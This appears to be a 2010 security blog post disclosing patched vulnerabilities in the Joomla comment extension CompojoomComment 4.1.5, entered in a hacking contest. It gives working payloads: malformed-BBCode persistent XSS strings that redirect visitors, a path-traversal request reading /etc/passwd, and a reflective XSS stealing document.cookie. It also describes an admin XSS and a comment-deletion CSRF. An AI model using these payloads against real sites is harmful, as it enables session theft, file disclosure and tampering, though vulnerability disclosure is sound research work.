jeffchannell.com

CompojoomComment 4.1.5 Multiple Vulnerabilities

Posted in Joomla!
2010-09-01 20:48:02 +0000 UTC

Since the CompojoomComment Hacking Contest is now over, and I was the only winner, I figured I'd go ahead and share my winning entries. These vulnerabilities are present in CompojoomComment 4.1.5, and are all patched in the latest (4.1.7 at the time of this writing).

Malformed BBCode Persistent XSS, #1

a[img]b[img]c[/img]d[/img]e
a[url=http://jeffchannell.com]b[img]c=''/style='position:absolute;top:-1px;left:-1px;width:999em;height:999em'/onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)'/[/url]d[/img]e

Malformed BBCode Persistent XSS, #2

[url=a]b'c='[img][/url]d[color=red]e[/img] onmouseover='location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104,97,110,110,101,108,108,46,99,111,109)' style='position:absolute;top:1px;left:1px;width:999em;height:999em' [/color]

Local File Inclusion

?option=com_comment
&no_html=1
&component=../../../../../../../../../../../../etc/passwd%00
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any

Reflective XSS

?option=com_comment
&no_html=1
&component=<script>alert(document.cookie);</script>
&joscsectionid=0
&josctask=ajax_search
&comment_id=0
&content_id=999
&search_keyword=a
&search_phrase=any

Administrator Persistent XSS

Name & Title inputs in comment edit aren't sanitized - a double quote in either field will allow for XSS in admin IF the admin edits that comment...

Comment Deletion CSRF

Embedding the "delete comment" URL in an [img] BBCode would result in comment deletion if an authorized admin loaded the page

Timeline